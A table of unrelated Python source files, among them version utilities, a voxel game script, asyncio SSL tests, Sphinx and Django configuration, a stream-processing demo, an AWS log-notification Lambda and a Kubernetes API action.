ext | sha | content |
---|---|---|
py | 7dfa6b82716242f0b792492ab22f8b2f39084cf5 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ambari Agent
"""
import re
def _normalize(v, desired_segments=0):
"""
:param v: Input string of the form "#.#.#" or "#.#.#.#"
:param desired_segments: If greater than 0 and v has fewer segments than this parameter, pads v with segments
containing "0" until the desired number of segments is reached.
:return: Returns a list of integers representing the segments of the version
"""
v_list = v.split(".")
if desired_segments > 0 and len(v_list) < desired_segments:
v_list = v_list + ((desired_segments - len(v_list)) * ["0", ])
return [int(x) for x in v_list]
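# Illustrative examples (not part of the original module): _normalize("2.2")
# returns [2, 2], while _normalize("2.2", desired_segments=4) pads the result
# to [2, 2, 0, 0].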
def format_stack_version(input):
"""
:param input: Input string, e.g. "2.2" or "GlusterFS", or "2.0.6.GlusterFS", or "2.2.0.1-885"
:return: Returns a well-formatted HDP stack version of the form #.#.#.# as a string.
"""
if input:
if "-" in input:
input_array = input.split("-")
input = input_array[0]
input = re.sub(r'^\D+', '', input)
input = re.sub(r'\D+$', '', input)
input = input.strip('.')
strip_dots = input.replace('.', '')
if strip_dots.isdigit():
normalized = _normalize(str(input))
if len(normalized) == 2:
normalized = normalized + [0, 0]
elif len(normalized) == 3:
normalized = normalized + [0, ]
normalized = [str(x) for x in normalized] # need to convert each number into a string
return ".".join(normalized)
return ""
def compare_versions(version1, version2, format=False):
"""
Used to compare either Ambari Versions, or Stack versions
E.g., Ambari version 1.6.1 vs 1.7.0,
Stack Version 2.0.6.0 vs 2.2.0.0
:param version1: First parameter for version
:param version2: Second parameter for version
:param format: optionally format the versions via format_stack_version before comparing them
:return: Returns -1 if version1 is before version2, 0 if they are equal, and 1 if version1 is after version2
"""
v1 = version1 if not format else format_stack_version(version1)
v2 = version2 if not format else format_stack_version(version2)
max_segments = max(len(v1.split(".")), len(v2.split(".")))
return cmp(_normalize(v1, desired_segments=max_segments), _normalize(v2, desired_segments=max_segments))
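# Illustrative examples (not part of the original module):
# compare_versions("1.6.1", "1.7.0") -> -1
# compare_versions("2.2", "2.2.0.0", format=True) -> 0
# Note that cmp() is a Python 2 builtin; a Python 3 port would need an
# equivalent such as (a > b) - (a < b) applied to the two normalized lists.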
def get_major_version(full_version):
"""
:param full_version: Input string, e.g. "2.1.3.0" or "2.2.0.1-885" and other similar
:return: Returns a well-formatted HDP major stack version of the form #.# as a string. If the major
version cannot be determined, returns None.
"""
pattern = re.compile(r'^[0-9]+\.[0-9]+')
major_version = None
m = pattern.search(full_version)
if m:
major_version = m.group()
return major_version
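# Illustrative examples (not part of the original module):
# get_major_version("2.2.0.1-885") -> "2.2"
# get_major_version("GlusterFS") -> None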
|
py | 7dfa6bbb235c56de04b317ceddd4cd361fa8d790 | import bge
from bge import logic as l
from random import randint
#import noise
import mathutils
import time
scene = l.getCurrentScene()
print(time.clock())
#builded = {}
MAP_HEIGHT = 40
wg = l.getCurrentController().owner
wg["blocknames"] = []
wg["voxel"] = {}
wg["blocks"] = {}
wg["needToBuild"] = []
wg["needToDel"] = []
wg["size"] = 21
scene.world.mistDistance = wg["size"] - 10
scene.world.mistStart = (wg["size"]) * 5/10
player = scene.objects["player"]
lastpos = player.worldPosition
player["lastpos"] = (lastpos.x,lastpos.y)
"""
0 air
1 dirt
2 dirt-grass
3 rock
"""
def fill_blocknames():
for block in scene.objectsInactive:
if block.name[:5] == "block":
wg["blocknames"].append(block.name)
wg["blocknames"].sort()
def getBlock(name_or_number):
try:
#raises an exception if it is a name, jumping to except
int(name_or_number)
#it is a number
return scene.objectsInactive[wg["blocknames"][name_or_number - 1]]
except:
#it is a string (a block name)
return scene.objectsInactive[name_or_number]
def putblock(pos,typ):
b = wg["blocks"].get(pos)
if b == None:
wg.worldPosition = pos
wg["blocks"][pos] = scene.addObject(getBlock(typ),wg)
def delblock(pos):
b = wg["blocks"].get(pos)
if not b == None:
try:
b.endObject()
del wg["blocks"][pos]
except:
print("hat nicht loechen koennen!")
def untervoxel(pos):
#collect the voxels directly below the neighbourhood around pos
unterevoxel = []
for dx in range(-1,1):
for dy in range(-1,1):
x = pos[0] + dx
y = pos[1] + dy
z = pos[2] - 1
if not wg["voxel"].get((x,y,z)) == 0:
unterevoxel.append(wg["voxel"].get((x,y,z)))
return unterevoxel
def generator():
t0 = time.clock()
for x in range(-100,100):
for y in range(-100,100):
n = mathutils.noise.hetero_terrain((x/20,y/20,0),25,100,3,1,4)
#n = (noise.snoise2(x/15,y/15,1) + 1)/2
height = int(n * MAP_HEIGHT/3) + 1
for z in range(height + 1):
if z == height:
typ = 2
else:
typ = 1
wg["voxel"][x,y,z] = typ
print("generate. ", time.clock() - t0)
def delAufXY(x,y):
for z in range(MAP_HEIGHT + 10):
delblock((x,y,z))
def blockAufXY(x,y):
for z in range(MAP_HEIGHT + 10):
h = MAP_HEIGHT - z + 10
v = wg["voxel"].get((x,y,h))
voxeldrumrum = [wg["voxel"].get((x,y,h + 1)),
wg["voxel"].get((x,y,h - 1)),
wg["voxel"].get((x,y + 1,h)),
wg["voxel"].get((x,y - 1,h)),
wg["voxel"].get((x + 1,y,h)),
wg["voxel"].get((x - 1,y,h))]
außen = False
for vox in voxeldrumrum:
if vox == None:
außen = True
if v != None and außen:
putblock((x,y,h),v)
def initialbuildblocks(size,pos):
builded = {}
t0 = time.clock()
#from above:
for x in range(pos[0] - size ,pos[0] + size + 1):
for y in range(pos[1] - size ,pos[1] + size + 1):
blockAufXY(x,y)
print("build. ", time.clock() - t0)
"""
for x in range(pos[0] - size ,pos[0] + size):
for y in range(pos[1] - size ,pos[1] + size):
for z in range(MAP_HEIGHT):
#builded[(x,y)] =
try:
putblock((x,y,z),wg["voxel"].get((x,y,z)))
except:
pass
"""
def deltapos(last,p):
return int(p[0]) - int(last[0]),int(p[1]) - int(last[1])
def refreshblocksList():
size = wg["size"]
pos = int(player.worldPosition.x),int(player.worldPosition.y)
dp = deltapos(player["lastpos"],pos)
if not dp == (0,0):
if abs(dp[0]) == 1:
print("###################################################### ",dp[0]," bewegt###############################################")
xp = dp[0] * (size) + pos[0]
xd = dp[0] * -(size + 1) + pos[0]
for y in range(pos[1] - size ,pos[1] + size + 1):
wg["needToBuild"].append((xp,y))
wg["needToDel"].append((xd,y))
player["lastpos"] = pos
#putblock((xp,y,z),voxel.get((xp,y,z)))
#delblock((xd, y, z))
if abs(dp[1]) == 1:
print("###################################################### ",dp[1]," bewegt###############################################")
yp = dp[1] * (size) + pos[1]
yd = dp[1] * -(size+1) + pos[1]
for x in range(pos[0] - size ,pos[0] + size + 1):
wg["needToBuild"].append((x,yp))
wg["needToDel"].append((x,yd))
player["lastpos"] = pos
#putblock((x,yp,z),voxel.get((x,yp,z)))
#delblock((x, yd, z))
#print("blocktobuild", wg["needToBuild"])
#print("blockstodel",wg["needToDel"])
def rebuildTerrain():
t0 = time.clock()
while len(wg["needToBuild"]) > 0 and (time.clock() - t0) < 0.002:
p = wg["needToBuild"][0]
blockAufXY(p[0],p[1])
wg["needToBuild"].pop(0)
while len(wg["needToDel"]) > 0 and (time.clock() - t0) < 0.002:
p = wg["needToDel"][0]
delAufXY(p[0],p[1])
wg["needToDel"].pop(0)
#print("muesste leer sein", wg["needToBuild"])
#print("muesste leer sein",wg["needToDel"])
fill_blocknames()
generator()
initialbuildblocks(wg["size"],(0,0,0))
player["started"]= True
def main():
pass |
py | 7dfa6c2c63b2be27818b08130d194f075f4dd395 | """Tests for asyncio/sslproto.py."""
import logging
import unittest
from unittest import mock
try:
import ssl
except ImportError:
ssl = None
import asyncio
from asyncio import log
from asyncio import sslproto
from asyncio import test_utils
@unittest.skipIf(ssl is None, 'No ssl module')
class SslProtoHandshakeTests(test_utils.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def ssl_protocol(self, waiter=None):
sslcontext = test_utils.dummy_ssl_context()
app_proto = asyncio.Protocol()
proto = sslproto.SSLProtocol(self.loop, app_proto, sslcontext, waiter)
self.assertIs(proto._app_transport.get_protocol(), app_proto)
self.addCleanup(proto._app_transport.close)
return proto
def connection_made(self, ssl_proto, do_handshake=None):
transport = mock.Mock()
sslpipe = mock.Mock()
sslpipe.shutdown.return_value = b''
if do_handshake:
sslpipe.do_handshake.side_effect = do_handshake
else:
def mock_handshake(callback):
return []
sslpipe.do_handshake.side_effect = mock_handshake
with mock.patch('asyncio.sslproto._SSLPipe', return_value=sslpipe):
ssl_proto.connection_made(transport)
def test_cancel_handshake(self):
# Python issue #23197: cancelling a handshake must not raise an
# exception or log an error, even if the handshake failed
waiter = asyncio.Future(loop=self.loop)
ssl_proto = self.ssl_protocol(waiter)
handshake_fut = asyncio.Future(loop=self.loop)
def do_handshake(callback):
exc = Exception()
callback(exc)
handshake_fut.set_result(None)
return []
waiter.cancel()
self.connection_made(ssl_proto, do_handshake)
with test_utils.disable_logger():
self.loop.run_until_complete(handshake_fut)
def test_eof_received_waiter(self):
waiter = asyncio.Future(loop=self.loop)
ssl_proto = self.ssl_protocol(waiter)
self.connection_made(ssl_proto)
ssl_proto.eof_received()
test_utils.run_briefly(self.loop)
self.assertIsInstance(waiter.exception(), ConnectionResetError)
def test_fatal_error_no_name_error(self):
# From issue #363.
# _fatal_error() generates a NameError if sslproto.py
# does not import base_events.
waiter = asyncio.Future(loop=self.loop)
ssl_proto = self.ssl_protocol(waiter)
# Temporarily turn off error logging so as not to spoil test output.
log_level = log.logger.getEffectiveLevel()
log.logger.setLevel(logging.FATAL)
try:
ssl_proto._fatal_error(None)
finally:
# Restore error logging.
log.logger.setLevel(log_level)
if __name__ == '__main__':
unittest.main()
|
py | 7dfa6c40603b2563ff9f0c60e72fb98aa08a76b3 | def memoize(fn):
"""storage of arguments and respective result"""
cache = {}
def cacheing(*args):
if args not in cache:
cache[args] = fn(*args)
return cache[args]
return cacheing
def slowFib(n):
if (n < 2):
return n
else:
return slowFib(n - 2) + slowFib(n - 1)
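# Illustrative usage (an assumption, not part of the original file): rebinding
# the name routes the recursive calls through the cache as well.
# slowFib = memoize(slowFib)
# slowFib(30)  # computed once; later calls with 30 are served from the cache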
|
py | 7dfa6e103abfa2186f4af1ce117e731b60e6621e | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# one-server documentation build configuration file, created by
# sphinx-quickstart on Sat Feb 21 10:59:15 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../../src/'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.development")
import django
django.setup()
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'one-server'
copyright = '2015, JR Minnaar'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'onedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'one-server.tex', 'one-server Documentation',
'JR Minnaar', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'one-server', 'one-server Documentation',
['JR Minnaar'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'one-server', 'one-server Documentation',
'JR Minnaar', 'one-server', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
py | 7dfa6e10d40c6bdc23ef559c9683920262e8cf27 | """
This code uses PyProbables:
https://pyprobables.readthedocs.io/en/latest/index.html
You will have to install PyProbables to use this code.
This code is a straightforward application of the
BloomFilter and CountMinSketch classes in PyProbables
to create an agent with a single input stream and a single
output stream. The input stream contains operations on an
object of one of the two classes and the output stream
contains results of the operations.
"""
import sys
import os
sys.path.append(os.path.abspath("../../IoTPy/core"))
sys.path.append(os.path.abspath("../../IoTPy/multiprocessing"))
sys.path.append(os.path.abspath("../../IoTPy/agent_types"))
sys.path.append(os.path.abspath("../../IoTPy/helper_functions"))
# stream is in ../../IoTPy/core
from stream import Stream
# op, source, sink are in ../../IoTPy/agent_types
from op import map_element
from source import source_file_to_stream
from sink import stream_to_file
# multicore is in ../../IoTPy/multiprocessing
from multicore import run_single_process_single_source
# helper_control is in ../../IoTPy/helper_functions
from helper_control import _no_value
import copy
from probables import (BloomFilter)
from probables import (CountMinSketch)
from probables.hashes import (default_sha256, default_md5)
def membership_in_stream(in_stream, out_stream, membership_object):
"""
Parameters
----------
in_stream: Stream
The input stream of the agent.
Each element of the input stream is a pair:
(function_name, string) where function_name is
a string which is one of 'add', 'check', 'remove'
or other string associated with a method of
membership_object.
out_stream: Stream
The output stream of the agent. The output stream
contains results of executing the method specified
by function name on membership_object.
membership_object: Membership
An instance of a Membership class such as BloomFilter
or CountMinSketch from PyProbables.
"""
def func(element):
# Each element of the input stream is assumed to be a
# pair: function_name and a value.
function_name, value = element
if function_name == 'add':
membership_object.add(value)
return _no_value
elif function_name == 'remove':
membership_object.remove(value)
return _no_value
elif function_name == 'check':
return (value, membership_object.check(value))
else:
raise ValueError
map_element(func, in_stream, out_stream)
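# Illustrative element flow (an assumption, not from the original file): with a
# BloomFilter membership_object, the input element ('add', 'apple') returns
# _no_value so nothing is appended to out_stream, while a later
# ('check', 'apple') puts ('apple', True) on out_stream; with a CountMinSketch,
# check() yields an estimated count rather than a boolean.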
#----------------------------------------------------------------------
# TESTS
#----------------------------------------------------------------------
def test_membership(
in_filename, bloom_filter_filename, count_min_sketch_filename):
"""
Parameters
----------
in_filename: str
name of the input file. This file contains two strings
separated by blanks on each line. The strings are a
function name and a value.
bloom_filter_filename: str
The output file which contains results of the operations
specified by the input file on a membership object of
type BloomFilter.
count_min_sketch_filename: str
The output file which contains results of the operations
specified by the input file on a membership object of
type CountMinSketch.
Note
----
This code creates a network with the following agents.
A single source agent reads the specified input file and
puts the contents of the file on a stream.
Two agents read the source stream; one agent produces
the bloom filter output and the other produces the count min
sketch output stream.
Agents copy the output streams to files
"""
# bloom_filter and count_min_sketch are examples of
# membership_object.
bloom_filter = BloomFilter(
est_elements=1000, false_positive_rate=0.05,
hash_function=default_sha256)
count_min_sketch = CountMinSketch(width=100000, depth=5)
def compute_func(in_streams, out_streams):
bloom_filter_out_stream = Stream('Bloom output stream')
count_min_sketch_out_stream = Stream('CountMinSketch output stream')
membership_in_stream(
in_stream=in_streams[0],
out_stream=bloom_filter_out_stream,
membership_object=bloom_filter)
membership_in_stream(
in_stream=in_streams[0],
out_stream=count_min_sketch_out_stream,
membership_object=count_min_sketch)
stream_to_file(
in_stream=bloom_filter_out_stream,
filename=bloom_filter_filename)
stream_to_file(
in_stream=count_min_sketch_out_stream,
filename=count_min_sketch_filename)
def source_func(out_stream):
"""
Puts the input file on to a stream.
"""
def g(element):
function_name, obj = element.split()
return (function_name, obj)
return source_file_to_stream(
func=g, out_stream=out_stream, filename=in_filename)
# Execute a single process with the specified single source
# and with the agents specified in compute_func.
run_single_process_single_source(source_func, compute_func)
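# The input file holds one "<function_name> <value>" pair per line; a
# hypothetical example (not the actual input_membership_test.txt) would be
# lines such as "add apple", "check apple", "check banana".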
def test_count_min_sketch(in_filename, out_filename):
membership_object = CountMinSketch(width=100000, depth=5)
def compute_func(in_streams, out_streams):
y = Stream('Bloom output stream')
membership_in_stream(
in_stream=in_streams[0], out_stream=y, membership_object=membership_object)
stream_to_file(in_stream=y, filename=out_filename)
def source_func(out_stream):
def g(element):
function_name, obj = element.split()
return (function_name, obj)
return source_file_to_stream(
func=g, out_stream=out_stream, filename=in_filename)
run_single_process_single_source(source_func, compute_func)
#----------------------------------------------------------------------
# RUN TESTS
#----------------------------------------------------------------------
if __name__ == '__main__':
print ('Test count_min_sketch')
test_count_min_sketch(
in_filename='input_membership_test.txt',
out_filename='output_count_min_sketch.txt')
print ('Output is in file output_count_min_sketch.txt')
print()
print ('Test membership with Bloom Filter')
test_membership(
in_filename='input_membership_test.txt',
bloom_filter_filename='output_bloom_filter_filename.txt',
count_min_sketch_filename='output_count_min_sketch_filename.txt')
print ('Output is in file output_count_min_sketch_filename.txt')
|
py | 7dfa6e97058f14120897b3bda27e587bb78f9a6f | nome=input('qual e o seu nome?')
print('e um prazer te conhecer,',nome)
print('bem-vindo')
|
py | 7dfa6f7517e45ac46bfbcbf3be44e5b997fbc862 | from django.test import TestCase
# Create your tests here.
import datetime
from django.utils import timezone
from .models import Question
class QuestionModelTest(TestCase):
def test_was_published_recently_with_future_question(self):
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date=time)
self.assertIs(future_question.was_published_recently(), False)
|
py | 7dfa70034672c8fad9da107f8c2e60eb078a99ad | import boto3
import base64
import gzip
import ast
import os
import json
import datetime
ses = boto3.client('ses')
def notify(from_address, to_address, subject, message):
ses.send_email(
Source = from_address,
Destination={'ToAddresses': [to_address],'CcAddresses': []},
Message={ 'Subject': {'Data': subject },'Body': {'Text': {'Data': message }}}
)
def handler(event, context):
str = event["awslogs"]["data"]
bytes = base64.b64decode(str)
data = gzip.decompress(bytes)
print(data.decode('utf-8'))
events = ast.literal_eval(data.decode('utf-8'))
for event in events["logEvents"]:
message = json.loads(event["message"])
response = message.get("responseElements",{})
eventSource = message.get("eventSource","N/A")
eventName = message.get('eventName',"N/A")
awsRegion = message.get("awsRegion","N/A")
instance = response.get("instancesSet",{}).get("items",[{}])[0]
imageId = instance.get("imageId","N/A")
instanceId = instance.get("instanceId","N/A")
instanceType = instance.get("instanceType","N/A")
instanceState = instance.get("instanceState",{}).get("name","N/A")
latency = datetime.datetime.utcnow() - datetime.datetime.strptime(message["eventTime"],'%Y-%m-%dT%H:%M:%SZ')
subject = f"AWS Notification ({latency})"
body = f"{eventSource} {eventName} in {awsRegion}\nImageId: {imageId}\nInstanceId: {instanceId}\nInstanceType: {instanceType}\nInstanceState: {instanceState}"
notify(os.environ['EMAIL_FROM'], os.environ['EMAIL_TO'], subject, body)
return data.decode('utf-8') |
py | 7dfa70f5c1efb368c01abfef1fecc72fda733ebe | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_weaponsmith_trainer_02.iff"
result.attribute_template_id = 9
result.stfName("npc_name","human_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
py | 7dfa71b2c846829b105add786a002117ab5778e0 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from paddle_serving_server_gpu.pipeline import PipelineClient
except ImportError:
from paddle_serving_server.pipeline import PipelineClient
import base64
client = PipelineClient()
client.connect(['127.0.0.1:9994'])
imgpath = "../../drink_dataset_v1.0/test_images/001.jpeg"
def cv2_to_base64(image):
return base64.b64encode(image).decode('utf8')
if __name__ == "__main__":
with open(imgpath, 'rb') as file:
image_data = file.read()
image = cv2_to_base64(image_data)
for i in range(1):
ret = client.predict(feed_dict={"image": image}, fetch=["result"])
print(ret)
|
py | 7dfa73a057c3df768b57b21781154e548978205a | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013, John McNamara, [email protected]
#
import unittest
from ..compatibility import StringIO
from ...contenttypes import ContentTypes
class TestInitialisation(unittest.TestCase):
"""
Test initialisation of the ContentTypes class and call a method.
"""
def setUp(self):
self.fh = StringIO()
self.contenttypes = ContentTypes()
self.contenttypes._set_filehandle(self.fh)
def test_xml_declaration(self):
"""Test ContentTypes xml_declaration()"""
self.contenttypes._xml_declaration()
exp = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
if __name__ == '__main__':
unittest.main()
|
py | 7dfa7469908a470e75a9bb755b03c9c37e45f69d | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-26 12:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Bookeep', '0002_book_user'),
]
operations = [
migrations.AlterField(
model_name='book',
name='finish_date',
field=models.DateTimeField(),
),
migrations.AlterField(
model_name='book',
name='start_date',
field=models.DateTimeField(),
),
]
|
py | 7dfa748eb4198c80570a0911b8e474392e77ba9e | import json
from lib.k8s import K8sClient
class replaceExtensionsV1beta1NamespacedReplicaSetStatus(K8sClient):
def run(
self,
body,
name,
namespace,
pretty=None,
config_override=None):
ret = False
args = {}
args['config_override'] = {}
args['params'] = {}
if config_override is not None:
args['config_override'] = config_override
if body is not None:
args['body'] = body
else:
return (False, "body is a required parameter")
if name is not None:
args['name'] = name
else:
return (False, "name is a required parameter")
if namespace is not None:
args['namespace'] = namespace
else:
return (False, "namespace is a required parameter")
if pretty is not None:
args['params'].update({'pretty': pretty})
if 'body' in args:
args['data'] = args['body']
args.pop('body')
args['headers'] = {'Content-type': u'application/json', 'Accept': u'application/json, application/yaml, application/vnd.kubernetes.protobuf'} # noqa pylint: disable=line-too-long
args['url'] = "apis/extensions/v1beta1/namespaces/{namespace}/replicasets/{name}/status".format( # noqa pylint: disable=line-too-long
body=body, name=name, namespace=namespace)
args['method'] = "put"
self.addArgs(**args)
self.makeRequest()
myresp = {}
myresp['status_code'] = self.resp.status_code
try:
myresp['data'] = json.loads(self.resp.content.rstrip())
except ValueError:
myresp['data'] = self.resp.content
if myresp['status_code'] >= 200 and myresp['status_code'] <= 299:
ret = True
return (ret, myresp)
|
py | 7dfa75728d2f14c760b87f7d450fde85c29d11fe | """meps_db URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path("", include("meps_db.components.urls")),
path("admin/", admin.site.urls),
]
|
py | 7dfa770af2c99de570999e8254f6e83686f88e03 | __all__ = ['transactions',
'chains',
'objecttypes',
'operations',
'memo',
'account']
|
py | 7dfa77ba0af70c19043e7428356cbadbef9f5e53 | """
Drawing with gamegrid
LightsOut Game
========= TigerJython =========="""
from gamegrid import *
def pressCallback(e):
loc = toLocationInGrid(e.getX(), e.getY())
locs = [0] * 5
locs[0] = Location(loc.x, loc.y)
locs[1] = Location(loc.x, loc.y - 1)
locs[2] = Location(loc.x, loc.y + 1)
locs[3] = Location(loc.x - 1, loc.y)
locs[4] = Location(loc.x + 1, loc.y)
for i in range(5):
a = getOneActorAt(locs[i])
if a != None:
a.showNextSprite()
refresh()
return True
makeGameGrid(5, 5, 50, Color.black, False,
mousePressed = pressCallback)
setTitle("LightsOut")
for i in range(5):
for k in range(5):
lamp = Actor("sprites/lightout.gif", 2)
addActor(lamp, Location(i, k))
lamp.show(1)
show()
|
py | 7dfa784bf19603acf1a11e49c12061e91c143800 | from celery import Celery
from celery.schedules import crontab
from micro import get_offers_all
import config
celery = Celery()
celery.config_from_object(config)
@celery.task(name="periodic_task")
def periodic_task():
print("Getting offers from Offers MS...")
get_offers_all()
|
py | 7dfa787fd69bfdccc6ad3614270dc84a320e8add | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2011 Midokura KK
# Copyright (C) 2011 Nicira, Inc
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""VIF drivers for libvirt."""
from nova import exception
from nova import flags
from nova.network import linux_net
from nova.openstack.common import cfg
from nova.openstack.common import log as logging
from nova import utils
